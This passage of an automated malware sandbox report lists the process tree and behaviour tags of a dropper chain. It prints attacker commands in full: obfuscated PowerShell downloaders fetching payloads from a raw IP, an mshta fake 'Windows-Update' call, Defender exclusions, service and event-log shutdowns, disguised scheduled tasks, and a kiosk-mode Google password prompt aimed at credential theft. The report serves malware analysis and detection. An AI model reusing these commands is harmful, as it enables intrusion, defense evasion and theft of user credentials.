436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeFunnyJellyfish.tmp788f72d2ea.exepid process 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe 6952 FunnyJellyfish.tmp 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
788f72d2ea.exepid process 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe 6212 788f72d2ea.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exeskotes.exefile.exewscript.exepowershell.exepowershell.exeWScript.execmd.exemshta.exepowershell.exeFunnyJellyfish.exeFunnyJellyfish.tmpcmd.exeFunnyJellyfish.exeFunnyJellyfish.tmpdescription pid process target process PID 3476 wrote to memory of 2360 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe skotes.exe PID 3476 wrote to memory of 2360 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe skotes.exe PID 3476 wrote to memory of 2360 3476 436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe skotes.exe PID 2360 wrote to memory of 1988 2360 skotes.exe L.exe PID 2360 wrote to memory of 1988 2360 skotes.exe L.exe PID 2360 wrote to memory of 1988 2360 skotes.exe L.exe PID 2360 wrote to memory of 2260 2360 skotes.exe ba6bdb3357.exe PID 2360 wrote to memory of 2260 2360 skotes.exe ba6bdb3357.exe PID 2360 wrote to memory of 2260 2360 skotes.exe ba6bdb3357.exe PID 2360 wrote to memory of 1352 2360 skotes.exe file.exe PID 2360 wrote to memory of 1352 2360 skotes.exe file.exe PID 1352 wrote to memory of 4304 1352 file.exe wscript.exe PID 1352 wrote to memory of 4304 1352 file.exe wscript.exe PID 4304 wrote to memory of 1384 4304 wscript.exe powershell.exe PID 4304 wrote to memory of 1384 4304 wscript.exe powershell.exe PID 4304 wrote to memory of 896 4304 wscript.exe powershell.exe PID 4304 wrote to memory of 896 4304 wscript.exe powershell.exe PID 1384 wrote to memory of 4932 1384 powershell.exe WScript.exe PID 1384 wrote to memory of 4932 1384 powershell.exe WScript.exe PID 896 wrote to memory of 1608 896 powershell.exe ipconfig.exe PID 896 wrote to memory of 1608 896 powershell.exe ipconfig.exe PID 4932 wrote to memory of 2160 4932 WScript.exe cmd.exe PID 4932 wrote to memory of 2160 4932 WScript.exe cmd.exe PID 2160 wrote to memory of 1196 2160 cmd.exe mshta.exe PID 2160 wrote to memory of 1196 2160 cmd.exe mshta.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 896 wrote to memory of 2108 896 powershell.exe RegSvcs.exe PID 1196 wrote to memory of 5424 1196 mshta.exe powershell.exe PID 1196 wrote to memory of 5424 1196 mshta.exe powershell.exe PID 5424 wrote to memory of 828 5424 powershell.exe powershell.exe PID 5424 wrote to memory of 828 5424 powershell.exe powershell.exe PID 2360 wrote to memory of 2424 2360 skotes.exe FunnyJellyfish.exe PID 2360 wrote to memory of 2424 2360 skotes.exe FunnyJellyfish.exe PID 2360 wrote to memory of 2424 2360 skotes.exe FunnyJellyfish.exe PID 2424 wrote to memory of 5656 2424 FunnyJellyfish.exe WerFault.exe PID 2424 wrote to memory of 5656 2424 FunnyJellyfish.exe WerFault.exe PID 2424 wrote to memory of 5656 2424 FunnyJellyfish.exe WerFault.exe PID 5656 wrote to memory of 4200 5656 FunnyJellyfish.tmp cmd.exe PID 5656 wrote to memory of 4200 5656 FunnyJellyfish.tmp cmd.exe PID 5656 wrote to memory of 4200 5656 FunnyJellyfish.tmp cmd.exe PID 4200 wrote to memory of 5200 4200 cmd.exe timeout.exe PID 4200 wrote to memory of 5200 4200 cmd.exe timeout.exe PID 4200 wrote to memory of 5200 4200 cmd.exe timeout.exe PID 2360 wrote to memory of 5840 2360 skotes.exe bb5b798a24.exe PID 2360 wrote to memory of 5840 2360 skotes.exe bb5b798a24.exe PID 2360 wrote to memory of 5840 2360 skotes.exe bb5b798a24.exe PID 2360 wrote to memory of 5272 2360 skotes.exe 41aed9b042.exe PID 2360 wrote to memory of 5272 2360 skotes.exe 41aed9b042.exe PID 2360 wrote to memory of 5272 2360 skotes.exe 41aed9b042.exe PID 4200 wrote to memory of 4344 4200 cmd.exe FunnyJellyfish.exe PID 4200 wrote to memory of 4344 4200 cmd.exe FunnyJellyfish.exe PID 4200 wrote to memory of 4344 4200 cmd.exe FunnyJellyfish.exe PID 4344 wrote to memory of 6952 4344 FunnyJellyfish.exe FunnyJellyfish.tmp PID 4344 wrote to memory of 6952 4344 FunnyJellyfish.exe FunnyJellyfish.tmp PID 4344 wrote to memory of 6952 4344 FunnyJellyfish.exe FunnyJellyfish.tmp PID 6952 wrote to memory of 2420 6952 FunnyJellyfish.tmp regsvr32.exe PID 6952 wrote to memory of 2420 6952 FunnyJellyfish.tmp regsvr32.exe PID 6952 wrote to memory of 2420 6952 FunnyJellyfish.tmp regsvr32.exe -
outlook_office_path 1 IoCs
Processes:
RegSvcs.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
Processes:
RegSvcs.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe"C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1988
-
-
C:\Users\Admin\AppData\Local\Temp\1007999001\ba6bdb3357.exe"C:\Users\Admin\AppData\Local\Temp\1007999001\ba6bdb3357.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2260 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:5736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa35e9cc40,0x7ffa35e9cc4c,0x7ffa35e9cc585⤵PID:5848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2108,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:25⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1776,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:35⤵PID:5740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1860,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1604 /prefetch:85⤵PID:5884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:15⤵
- Uses browser remote debugging
PID:6108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:15⤵
- Uses browser remote debugging
PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:15⤵
- Uses browser remote debugging
PID:4712
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵PID:6532
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 13124⤵
- Program crash
PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:6652 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵PID:5176
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:7064
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc11⤵
- Launches sc.exe
PID:1608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc11⤵
- Launches sc.exe
PID:6732
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv11⤵
- Launches sc.exe
PID:1564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits11⤵
- Launches sc.exe
PID:5780
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc11⤵
- Launches sc.exe
PID:6832
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 011⤵
- Power Settings
PID:5956
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 011⤵
- Power Settings
PID:6748
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 011⤵
- Power Settings
PID:1824
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 011⤵
- Power Settings
PID:6048
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵PID:440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"11⤵
- Launches sc.exe
PID:6504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"11⤵
- Launches sc.exe
PID:3508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:6528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"11⤵
- Launches sc.exe
PID:2072
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns6⤵
- Gathers network information
PID:1608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\is-CLKU4.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-CLKU4.tmp\FunnyJellyfish.tmp" /SL5="$A01FA,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5656 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\timeout.exetimeout /T 36⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\is-B9LT7.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-B9LT7.tmp\FunnyJellyfish.tmp" /SL5="$A01DC,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:6952 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{F05639EB-36B2-4A42-9785-97DCB6CEB638}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008011001\bb5b798a24.exe"C:\Users\Admin\AppData\Local\Temp\1008011001\bb5b798a24.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\1008012001\41aed9b042.exe"C:\Users\Admin\AppData\Local\Temp\1008012001\41aed9b042.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5272
-
-
C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe"C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6212 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:4872
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
PID:6676 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d46c04b-3ada-4158-b888-4edb688f64d2} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" gpu6⤵PID:5260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14225fe6-c6e4-4b7f-a2c7-35e38b1fad92} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" socket6⤵PID:3272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3060 -childID 1 -isForBrowser -prefsHandle 3204 -prefMapHandle 2832 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e02f9ec-54e3-4cc3-b153-1d871861c9a2} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab6⤵PID:4756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3660 -childID 2 -isForBrowser -prefsHandle 3616 -prefMapHandle 3652 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdca4246-0e36-4ab1-8b24-435b0f86a0e6} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab6⤵PID:872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4168 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4212 -prefMapHandle 4208 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca8e53c-a687-401c-a5c8-7d74d6f75d57} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" utility6⤵PID:4668
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 3 -isForBrowser -prefsHandle 5408 -prefMapHandle 4752 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aae5cff2-a692-4998-98f5-253222628dc5} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab6⤵PID:1588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 4 -isForBrowser -prefsHandle 5680 -prefMapHandle 5496 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29d595d-5016-4fb1-80e9-87745329365a} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab6⤵PID:5196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 5 -isForBrowser -prefsHandle 5828 -prefMapHandle 5768 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9132137-f2ae-4261-aef7-876df48de706} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab6⤵PID:6336
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008014001\c8807293c3.exe"C:\Users\Admin\AppData\Local\Temp\1008014001\c8807293c3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
